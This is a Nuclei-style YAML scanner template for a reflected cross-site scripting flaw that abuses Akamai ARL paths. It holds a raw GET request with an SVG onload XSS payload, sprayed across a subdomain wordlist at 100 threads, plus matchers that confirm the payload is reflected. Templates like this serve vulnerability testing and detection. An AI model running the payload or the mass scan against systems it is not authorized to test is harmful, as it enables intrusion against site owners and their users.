id: akamai-arl-xss
info:
  name: Open Akamai ARL XSS
  author: pdteam
  severity: medium
  tags: akamai,xss
  reference: |
    - https://github.com/war-and-code/akamai-arl-hack
    - https://twitter.com/SpiderSec/status/1421176297548435459
    - https://warandcode.com/post/akamai-arl-hack/
    - https://github.com/cybercdh/goarl
    - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"><svg onload=confirm(document.domain)>'
          - 'Suggestions for improving the results'
      - type: word
        part: header
        words:
          - 'text/html'
